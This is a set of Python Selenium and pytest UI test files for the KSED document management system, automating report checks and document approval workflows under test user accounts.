@allure.step("Смягчение решения")
def softDecision_RD(self):
time.sleep(10)
self.get(self._web_driver.current_url)
self.softDecision.wait_to_be_clickable()
self.softDecision.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
self.confirm2.wait_to_be_clickable()
self.confirm2.click()
self.wait_page_loaded(wait_for_xpath_to_disappear='//div[@id = "message"]//span[@class = "wait"]')
# self.wait_page_loaded()
# self.osnSvedeniya.wait_to_be_clickable()
# self.osnSvedeniya.scroll_to_element()
# self.osnSvedeniya.click()
self.wait_page_loaded()
if dataTest.baseURL == 'http://172.30.48.40:8080/share/page/arm?code=SED':
assert "Согласовано" in self.statusInner_3.get_text()
else:
assert "Согласовано" in self.statusInner_2.get_text()
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
import time, datetime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import *
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from KSED.Pages.PageObject import Locator
from KSED.TestData.data import dataTest
from KSED.TestData.locators import KSEDLocators
import allure
def wait_page_loaded(driver):
time.sleep(2)
page_loaded = False
while not page_loaded:
page_loaded = driver.execute_script("return document.readyState == 'complete';")
time.sleep(0.1)
class decorators(Locator, dataTest, KSEDLocators):
def __init__(self, web_driver, uri=''):
super().__init__(web_driver, uri)
#self.get(dataTest.baseURL)
wait_page_loaded(self.w)
# Выйдем из системы
def USER_LOGOUTs(self, ):
page = Locator(self.w)
wait = WebDriverWait(self.w, 10)
page.user_menu.click()
page.USER_LOGOUT.click()
wait_page_loaded(self.w)
assert "Войти" in self.w.title
def logout(self, function):
def wrapper():
function()
self.USER_LOGOUTs()
# page = Locator(self.w)
#
# wait = WebDriverWait(self.w, 10)
#
# page.user_menu.click()
#
# page.USER_LOGOUT.click()
#
# wait_page_loaded(self.w)
#
# assert "Войти" in self.w.title
return wrapper
# @logout
# def stable():
# print('после')
#print(stable())
--- FILE SEPARATOR ---
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# This is example shows how we can manage failed tests
# and make screenshots after any failed test case.
import pytest
import allure
import uuid
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.firefox.options import Options
@pytest.hookimpl(hookwrapper=True, tryfirst=True)
def pytest_runtest_makereport(item, call):
# This function helps to detect that some test failed
# and pass this information to teardown:
outcome = yield
rep = outcome.get_result()
setattr(item, "rep_" + rep.when, rep)
return rep
@pytest.fixture
def web_browser(request, selenium):
# options = Options() # запуск firefox в скрытом режиме
# options.add_argument('-headless') # запуск firefox в скрытом режиме
# browser = webdriver.Firefox(executable_path='geckodriver', options=options) # запуск firefox в скрытом режиме
# options = Options() # запуск chrome в скрытом режиме
# options.add_argument('--headless') # запуск chrome в скрытом режиме
# browser = webdriver.Chrome(chrome_options=options) # запуск chrome в скрытом режиме
# options = webdriver.ChromeOptions()
# options.add_argument('headless')
# browser = webdriver.Chrome(options=options)
browser = selenium # закомментировать для скрытого режима
# browser.set_window_size(1920, 1080)
browser.maximize_window()
# browser.set_window_size(1920, 1080)
#browser.maximize_window()
# Return browser instance to test case:
browser.implicitly_wait(10)
yield browser
# Do teardown (this code will be executed after each test):
# if request.node.rep_call.failed:
if request.node.rep_call:
# Make the screen-shot always:
try:
browser.execute_script("document.body.bgColor = 'white';")
# Make screen-shot for local debug:
browser.save_screenshot('screenshots/' + str(uuid.uuid4()) + '.png')
# Attach screenshot to Allure report:
allure.attach(browser.get_screenshot_as_png(),
name=request.function.__name__,
attachment_type=allure.attachment_type.PNG)
# For happy debugging:
print('URL: ', browser.current_url)
print('Browser logs:')
for log in browser.get_log('browser'):
print(log)
except:
pass # just ignore any errors here
browser.quit()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk12011 import KSEDStatAllureVidDic
from KSED.Tests.tk12013 import KSEDStatAllureTipDoc
from KSED.Tests.tk12012_1 import KSEDStatAllureTemDoc
from KSED.Tests.tk12012_2 import KSEDStatAllureTemDocO
from KSED.Tests.tk12030 import KSEDallurResolution
from KSED.Tests.tk12006 import KSEDallur
from KSED.Tests.tk12022 import KSEDallurInDoc
from KSED.Tests.tk12025 import KSEDallurIsp
from KSED.Tests.tk12026 import KSEDallurDeadLine
from KSED.Tests.tk12027 import KSEDallurEffPodr
from KSED.Tests.tk12029 import KSEDallurReestr
@allure.feature('Статический отчет "Сводка по видам документов')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12011(web_browser):
""" Статический отчет "Сводка по видам документов """
page = KSEDStatAllureVidDic(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
#getDoc = page.StatAllureVidDoc()
@allure.feature('Статический отчет "Сводка по типам документов')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12013(web_browser):
""" Статический отчет "Сводка по типам документов """
page = KSEDStatAllureTipDoc(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
getDoc = page.StatAllureTipDoc()
@allure.feature('Статический отчет "Сводка по тематикам документов')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12012_1(web_browser):
""" Статический отчет "Сводка по тематикам документов """
page = KSEDStatAllureTemDoc(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
getDoc = page.StatAllureTemDoc()
@allure.feature('Статический отчет "Сводка по тематикам документов (Объедин.)')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12012_2(web_browser):
""" Статический отчет "Сводка по тематикам документов(Объедин.) """
page = KSEDStatAllureTemDocO(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
getDoc = page.StatAllureTemDocO()
# closeWindow = page.closeWindow()
# getDoc = page.StatAllureTemDocO()
@allure.feature('Статический отчет "Сводка по тематикам документов (Объедин.)')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12030(web_browser):
""" """
page = KSEDallurResolution(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!') # Авторизуемся
# getDoc = page.StatAllureTemDocO()
# closeWindow = page.closeWindow()
# getDoc = page.StatAllureTemDocO()
#****Сергей
@allure.feature('Проверка отчетов в узле "Журналы" раздела "Отчеты"')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12006(web_browser):
""" """
page = KSEDallur(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@allure.feature('Отчет "Исполнение входящих документов"')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12022(web_browser):
""" """
page = KSEDallurInDoc(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@allure.feature('Отчет "Исполнительская дисциплина по авторам"')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12025(web_browser):
""" """
page = KSEDallurIsp(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@allure.feature('Отчет "Неисполненные поручения с истекшим сроком"')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12026(web_browser):
""" """
page = KSEDallurDeadLine(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@allure.feature('Отчет "Продуктивность по исполнителям"')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12027(web_browser):
""" """
page = KSEDallurEffPodr(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
@allure.feature('Отчет "Реестр для закрытия неактуальных контрольных поручений"')
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_12029(web_browser):
""" """
page = KSEDallurReestr(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
--- FILE SEPARATOR ---
# #!/bin/sh
# #!/usr/bin/python3
#
# # -*- encoding=utf8 -*-
#
#
#
# # How to run:
#
# #.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_15772 --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_18338 --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v --driver IE --driver-path WebDriver\IEDriverServer --alluredir ./allure_report
#IEDriver
# #.... allure generate ./allure_report && allure open allure-report
# # -s команда вывода всех print в консоль
#
#
#
import pytest
import allure
from KSED.Tests.tk15720 import KSEDCreatDocCS_RD
from KSED.Tests.tk15722 import KSEDCreatDocCS_LND
from KSED.Tests.tk15723 import KSEDCreatDocCS_ETC
from KSED.Tests.tk15745 import KSEDCreatWaySogl
from KSED.Tests.tk15750 import KSEDCreatWaySogl_RD
from KSED.Tests.tk15744 import KSEDaddPerson
from KSED.Tests.tk15755 import KSEDNaprSogl_RD
from KSED.Tests.tk15758 import KSEDaddNewVersion
from KSED.Tests.tk15759 import KSEDaddNewAtt
from KSED.Tests.tk15765 import KSEDreject_RD
from KSED.Tests.tk15764 import KSEDacceptSogl_RD
from KSED.Tests.tk15767 import KSEDinnerSogl_RD
from KSED.Tests.tk15772 import KSEDrejectInnerSogl_RD
from KSED.Tests.tk15777 import KSEDrejectTaskInnerSogl_RD
from KSED.Tests.tk15779 import KSEDrepeatInnerSogl_RD
from KSED.Tests.tk15780 import KSEDAcceptInnerSogl_RD
from KSED.Tests.tk15781 import KSEDaddComment
from KSED.Tests.tk15806 import KSEDtakeTask
from KSED.Tests.tk15807 import KSEDbackTask
from KSED.Tests.tk15810 import KSEDreturnDecision_RD
from KSED.Tests.tk15812 import KSEDsoftDecision_RD
from KSED.Tests.tk18300 import KSEDchangeAfterRejectInnerSogl_RD
from KSED.Tests.tk18302 import KSEDsoftDesAfterRejectInnerSogl_RD
from KSED.Tests.tk18327 import KSEDchangeAfterAcceptInnerSogl_RD
from KSED.Tests.tk18329 import KSEDchangeAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.tk18330 import KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.tk18332 import KSEDaddCommentInnerSogl_RD
from KSED.Tests.tk18334 import KSEDInnerSoglAfterAddComment_RD
from KSED.Tests.tk18336 import KSEDacceptSoglwithRemark_RD
from KSED.Tests.tk18337 import KSEDrejectAfterAcceptSoglwithRemark_RD
from KSED.Tests.tk18338 import KSEDsoftDisAfterAcceptSoglwithRemark_RD
from KSED.Tests.tk18360 import KSEDreturnDisFromDelegatAfterReject_RD
from KSED.Tests.tk18361 import KSEDreturnDisAfterTakeTask
from KSED.Tests.tk18362 import KSEDsoftDisFromDelegatAfterReject_RD
from KSED.Tests.tk18363 import KSEDsoftDisAfterTakeTask
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15720(web_browser):
""" Создание КС _ вид РД"""
page = KSEDCreatDocCS_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15722(web_browser):
""" Создание КС _ Вид ЛНД"""
page = KSEDCreatDocCS_LND(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15723(web_browser):
""" Создание КС _ вид Прочие"""
page = KSEDCreatDocCS_ETC(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15744(web_browser):
""" Добавление сотрудника в этап """
page = KSEDaddPerson(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
create_route = page.creation_of_the_approval_route()
# create_route = page.creation_of_the_approval_route()
#
# Attach = page.attachment()
#
# NaprNaSogl = page.NapSoglasovanie()
# saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15745(web_browser):
""" Создание нетипового маршрута """
page = KSEDCreatWaySogl(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
create_route = page.creation_of_the_approval_route()
# Attach = page.attachment()
# NaprNaSogl = page.NapSoglasovanie()
# saveLink = page.LinkDocWFile()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15750(web_browser):
""" Создание типового маршрута """
# Шаг 1 создание документа
page = KSEDCreatWaySogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDCreatWaySogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15755(web_browser):
""" Направление на согласование """
# Шаг 1 создание документа
page = KSEDNaprSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15758(web_browser):
""" Добавление новой версии """
# Шаг 1 создание документа
page = KSEDaddNewVersion(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDaddNewVersion(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
# Шаг 4 возврат с согласования
reject = page.rejectYourself()
# Шаг 5 загрузка новой версии файла
attach = page.attachment_docReady()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15759(web_browser):
""" Добавление новой версии """
# Шаг 1 создание документа
page = KSEDaddNewAtt(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDaddNewAtt(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
# Шаг 4 возврат с согласования
reject = page.rejectYourself()
# Шаг 5 загрузка нового файла
attach = page.attachment_NewDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15764(web_browser):
""" Основное согласование """
# Шаг 1 создание документа
page = KSEDacceptSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDacceptSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDacceptSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15765(web_browser):
""" Отклонение согласования """
# Шаг 1 создание документа
page = KSEDreject_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDreject_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15767(web_browser):
""" Внутреннее согласование """
# Шаг 1 создание документа
page = KSEDinnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDinnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15772(web_browser):
""" Возврат с внутреннеего согласования """
# Шаг 1 создание документа
page = KSEDrejectInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDrejectInnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 направление на внутреннее согласования
page2 = KSEDrejectInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
# Шаг 5 отзыв внутреннего согласования
rejectInnerSogl = page2.rejectInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15777(web_browser):
""" Отзыв задачи внутренеего согласования """
# Шаг 1 создание документа
page = KSEDrejectTaskInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDrejectTaskInnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDrejectTaskInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
rejectTaskInnerSogl = page2.rejectTaskInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15779(web_browser):
""" Повторная отправка на внутрненнее согласование """
# Шаг 1 создание документа
page = KSEDrepeatInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDrepeatInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
rejectTaskInnerSogl = page2.rejectTaskInnerSogl()
repeatInnerApp = page2.repeatInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15780(web_browser):
""" Внутреннее согласование - вынесение решения"""
# Шаг 1 создание документа
page = KSEDAcceptInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDAcceptInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 согласование на внутреннее согласование
page3 = KSEDAcceptInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.AcceptInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15781(web_browser):
""" Основное согласование - внесение замечаний """
# Шаг 1 создание документа
page = KSEDaddComment(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDacceptSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDaddComment(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
addComment = page2.addComment()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15806(web_browser):
""" Забрать задачу согласования"""
# Шаг 1 создание документа
page = KSEDtakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDtakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDtakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15807(web_browser):
""" Возврат задачи согласования """
# Шаг 1 создание документа
page = KSEDbackTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDbackTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDbackTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
# Шаг 5 вернуть задачу
take = page2.backTask_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15810(web_browser):
""" Отзыв решения """
# Шаг 1 создание документа
page = KSEDreturnDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDreturnDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDreturnDecision_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
# Шаг 4 отзыв решения
returnDecision = page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_15812(web_browser):
""" Смягчение решения """
# Шаг 1 создание документа
page = KSEDsoftDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDsoftDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDsoftDecision_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
# Шаг 4 отзыв решения
returnDecision = page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18300(web_browser):
""" Внутреннее согласование - отзыв решения после отклонения"""
# Шаг 1 создание документа
page = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.RejectInnerSogl()
innerSogl = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_18302(web_browser):
""" Внутреннее согласование - смягчение решения после отклонения"""
# Шаг 1 создание документа
page = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.RejectInnerSogl()
